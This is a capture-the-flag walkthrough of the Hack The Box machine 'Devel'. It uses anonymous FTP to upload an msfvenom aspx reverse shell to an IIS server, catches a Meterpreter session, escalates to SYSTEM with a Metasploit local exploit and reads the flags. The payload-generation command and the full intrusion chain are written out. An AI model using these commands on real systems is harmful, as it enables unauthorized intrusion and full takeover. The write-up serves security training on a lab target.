HTB - Devel
Nmap scan result
Lets perform a nmap scan on the target IP,
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -sC -sV 10.10.10.5 -A
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-02 11:59 EST
Nmap scan report for 10.10.10.5
Host is up (0.36s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods:
|_ Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.95 seconds
Seems like there are two common services used by this machine IP
Enumeration
We can see that FTP Anonymous Login
is enabled on this FTP service
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
By accessing anonymous login with username as anonymous
and blank password,
┌──(kali㉿aidenpearce369)-[~]
└─$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
We are able to list its contents, looks like a web server
Lets visit the web service running on Microsoft IIS httpd 7.5
Looks like the welcome.png
image is from ftp
directory
And searching exploits for IIS httpd 7.5
in searchsploit
,
┌──(root💀aidenpearce369)-[/home/kali]
└─# searchsploit iis 7.5
------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------- ---------------------------------
Microsoft IIS 6.0/7.5 (+ PHP) - Mult | windows/remote/19033.txt
Microsoft IIS 7.5 (Windows 7) - FTPS | windows/dos/15803.py
------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
Thats just some authentication bypass
PoC and dos
exploit
Gaining access
Since, our files for the webserver are inside the ftp directory which can be easily accessed by anonymous login
We can create a aspx reverse shell
using msfvenom
and place it inside the ftp directory to spawn it while loading the page
Creating the aspx reverse shell
,
┌──(root💀aidenpearce369)-[/home/kali]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9876 -f aspx -o rshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2860 bytes
Saved as: rshell.aspx
Uploading the reverse shell into the ftp directory,
┌──(kali㉿aidenpearce369)-[~]
└─$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> put rshell.aspx
local: rshell.aspx remote: rshell.aspx
229 Entering Extended Passive Mode (|||49159|)
125 Data connection already open; Transfer starting.
100% |**************************| 2897 16.34 MiB/s --:-- ETA
226 Transfer complete.
2897 bytes sent in 00:00 (9.59 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-02-22 07:50PM 2897 rshell.aspx
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp>
After uploading it into the directory lets configure our listener and make a request to http://10.10.10.5/rshell.aspx
to spawn the reverse shell
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.6LHOST => 10.10.14.6
msf6 exploit(multi/handler) > set LPORT 9876
LPORT => 9876
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.6:9876
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.6:9876 -> 10.10.10.5:49161 ) at 2022-03-02 12:49:06 -0500
meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
Privilege escalation
We can clearly see that we have SeImpersonatePrivilege
privilege for the current user
This privilege will allow the current user to create process with other user’s privilege
We can use print spoofer/juicy potato priv esc attacks
with this privilege, if the conditions are met
Watson is a windows local privilege escalation checker, where it fuzzes for all possible vulnerabilites to escalate the privileges
We could also check for LPE vulnerabilities using Watson
but, that requires .NET compatibility
on victim machine and we have to build the exe
according to the .NET version
To check the .NET versions on the target machine,
meterpreter > shell
Process 1172 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5
c:\windows\system32\inetsrv>dir c:\Windows\Microsoft.NET\Framework
dir c:\Windows\Microsoft.NET\Framework
Volume in drive C has no label.
Volume Serial Number is 137F-3971
Directory of c:\Windows\Microsoft.NET\Framework
...
14/07/2009 04:37 �� <DIR> v1.0.3705
14/07/2009 04:37 �� <DIR> v1.1.4322
18/03/2017 01:06 �� <DIR> v2.0.50727
14/07/2009 06:56 �� <DIR> v3.0
14/07/2009 06:52 �� <DIR> v3.5
18 File(s) 309.424 bytes
7 Dir(s) 4.697.403.392 bytes free
c:\windows\system32\inetsrv>
Anyways thats going to take some time, instead of that we are going to use Local Exploit Suggester
from metasploit
which is almost similar to Watson
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > search local exploit suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use 0
msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 40 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
Keep in mind that some of the results are false positive
too
We have go through each one of these, until we gain access
msf6 exploit(windows/local/bypassuac_eventvwr) > use exploit/windows/local/ntusermndragover
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ntusermndragover) > show options
Module options (exploit/windows/local/ntusermndragover):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 2 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.116.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 x86
msf6 exploit(windows/local/ntusermndragover) > set session 2
session => 2
msf6 exploit(windows/local/ntusermndragover) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
msf6 exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Reflectively injecting the exploit DLL and running the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 3444 launched.
[*] Reflectively injecting the DLL into 3444...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.6:4444 -> 10.10.10.5:49176 ) at 2022-03-02 13:30:02 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRelabelPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeTrustedCredManAccessPrivilege
SeUndockPrivilege
Now we have gained privilege over the target machine
Looting the secrets,
meterpreter > shell
Process 272 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>cd C:\Users\
cd C:\Users\
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 137F-3971
Directory of C:\Users
18/03/2017 01:16 �� <DIR> .
18/03/2017 01:16 �� <DIR> ..
18/03/2017 01:16 �� <DIR> Administrator
17/03/2017 04:17 �� <DIR> babis
18/03/2017 01:06 �� <DIR> Classic .NET AppPool
14/07/2009 09:20 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 4.697.284.608 bytes free
C:\Users>more C:\Users\babis\Desktop\user.txt
more C:\Users\babis\Desktop\user.txt
<USER FLAG>
C:\Users>more C:\Users\Administrator\Desktop\root.txt
more C:\Users\Administrator\Desktop\root.txt
<ROOT FLAG>